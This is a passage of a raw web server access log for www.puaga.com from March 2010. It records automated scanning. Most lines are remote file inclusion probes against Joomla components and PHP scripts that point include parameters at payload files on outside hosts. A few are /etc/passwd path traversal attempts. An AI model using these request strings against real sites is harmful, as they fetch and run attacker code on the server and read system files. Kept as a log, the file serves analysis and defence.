70.86.52.250 - - [01/Mar/2010:12:39:01 -0800] "GET /logs/access_100224.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:39:01 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:39:18 -0800] "GET /logs/access_100220.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:12:42:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:12:42:08 -0800] "GET /skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:12:42:12 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:12:42:12 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:42:32 -0800] "GET /logs/access_100213.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:12:43:42 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:44:16 -0800] "GET /cpg.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:44:16 -0800] "GET /logs//cpg.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:44:17 -0800] "GET /logs/access_100123.log//cpg.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:44:52 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:44:52 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:44:52 -0800] "GET /logs/access_100207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:45:01 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:45:00 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:45:01 -0800] "GET /logs/access_100207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:45:25 -0800] "GET /logs/access_100129.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:45:32 -0800] "GET /logs/access_100129.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:12:47:15 -0800] "GET /errors.php?error=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:12:47:17 -0800] "GET /errors.php?error=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:48:32 -0800] "GET /logs/access_100217.log//rsgallery.html.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:49:10 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:49:10 -0800] "GET /logs/access_100128.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:49:10 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:49:11 -0800] "GET /logs/access_100205.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:49:21 -0800] "GET /logs/access_100222.log//rsgallery.html.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:50:03 -0800] "GET /logs//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:50:03 -0800] "GET /logs/access.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:50:03 -0800] "GET /private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:50:37 -0800] "GET /logs/access_100213.log%20%20//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:53:07 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:53:07 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:53:07 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:53:07 -0800] "GET /logs/access_100211.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:54:18 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:54:18 -0800] "GET /logs/access_100128.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:54:18 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:54:33 -0800] "GET /logs/access_100221.log////index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:54:35 -0800] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:54:35 -0800] "GET /logs/access_100205.log//param.peoplebook.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:54:35 -0800] "GET /logs////index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:56:30 -0800] "GET /logs/access_100221.log//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:56:35 -0800] "GET /logs/access_100219.log//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:12:57:40 -0800] "GET /logs/access_100214.log//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:12:57:45 -0800] "GET /logs/access_100205.log//skin/zero_vote/error.php?dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:58:42 -0800] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:59:45 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:59:45 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:00:00 -0800] "GET /logs/access_100125.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:00:39 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:00:39 -0800] "GET /logs/access_100224.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:00:40 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:00:57 -0800] "GET /logs/access_100125.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [01/Mar/2010:13:00:58 -0800] "GET /logs/sub.php?s=http://www.autoint.kr/data/session/asu/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [01/Mar/2010:13:01:04 -0800] "GET /logs/access_100205.log%20%20/sub.php?s=http://www.autoint.kr/data/session/asu/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:01:58 -0800] "GET /logs/access_100130.log//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:01:58 -0800] "GET /aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:01:58 -0800] "GET /logs//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:05:45 -0800] "GET /logs//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:05:45 -0800] "GET /aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:05:45 -0800] "GET /logs/access_100130.log%20%20//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:06:44 -0800] "GET /logs/access_100224.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:07:08 -0800] "GET /logs/access_100224.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:07:48 -0800] "GET /logs/access_100210.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:08:15 -0800] "GET /logs/access_100210.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.93.80 - - [01/Mar/2010:13:09:46 -0800] "GET /logs/access_090929.log HTTP/1.0" 404 5258 "http://theinvestblog.com" "Mozilla/0.91 Beta (Windows)" "www.puaga.com"
193.138.158.46 - - [01/Mar/2010:13:10:50 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.158.46 - - [01/Mar/2010:13:10:50 -0800] "GET /logs/access_100131.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.158.46 - - [01/Mar/2010:13:10:50 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [01/Mar/2010:13:12:00 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.158.46 - - [01/Mar/2010:13:13:09 -0800] "GET /logs/access_100131.log//modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:13:49 -0800] "GET /logs/access_100130.log%20%20//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:13:49 -0800] "GET /logs//aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:13:13:49 -0800] "GET /aedating4CMS.php?dir[inc]=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.169.186.170 - - [01/Mar/2010:13:14:20 -0800] "GET /logs/access_100207.log HTTP/1.0" 200 1441792 "http://www.puaga.com/logs/access_100207.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]" "www.puaga.com"
122.199.140.158 - - [01/Mar/2010:13:15:07 -0800] "GET /logs/access_100205.log/sub.php?s=http://www.autoint.kr/data/session/asu/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.158.46 - - [01/Mar/2010:13:15:21 -0800] "GET /logs/access_100125.log//modules/TotalCalendar/about.php?inc_dir=http://www.whites.xpg.com.br/zfx/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:13:15:52 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:13:15:52 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:13:15:56 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:15:56 -0800] "GET /admin.ricettario.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:16:00 -0800] "GET /logs/access_100123.log%20%20//admin.ricettario.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:16:00 -0800] "GET /logs//admin.ricettario.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:13:16:00 -0800] "GET /logs/access_100218.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:13:16:02 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:13:16:02 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:13:16:02 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:13:16:08 -0800] "GET /logs/access_100218.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [01/Mar/2010:13:16:53 -0800] "GET /ideal/?N=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:17:06 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [01/Mar/2010:13:17:18 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [01/Mar/2010:13:17:18 -0800] "GET /skin/zero_vote/error.php?dir=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [01/Mar/2010:13:17:18 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:17:20 -0800] "GET /logs/access_100118.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:17:20 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [01/Mar/2010:13:17:24 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:17:59 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:17:59 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:18:01 -0800] "GET /logs/access_100118.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:18:15 -0800] "GET /logs/access_100120.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:18:17 -0800] "GET /logs/access_100209.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:18:17 -0800] "GET /logs/access_100208.log%20%20//admin.ricettario.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:18:18 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:18:22 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:18:22 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:18:39 -0800] "GET /logs/access_100120.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:20:35 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:20:36 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:13:20:48 -0800] "GET /logs/access_100123.log//admin.ricettario.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:13:20:49 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [01/Mar/2010:13:21:51 -0800] "GET /logs//blastchatc.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:13:23:04 -0800] "GET /Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:13:23:05 -0800] "GET /logs/Writer.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:13:23:05 -0800] "GET /logs/access_100220.log/Writer.php?mosConfig_absolute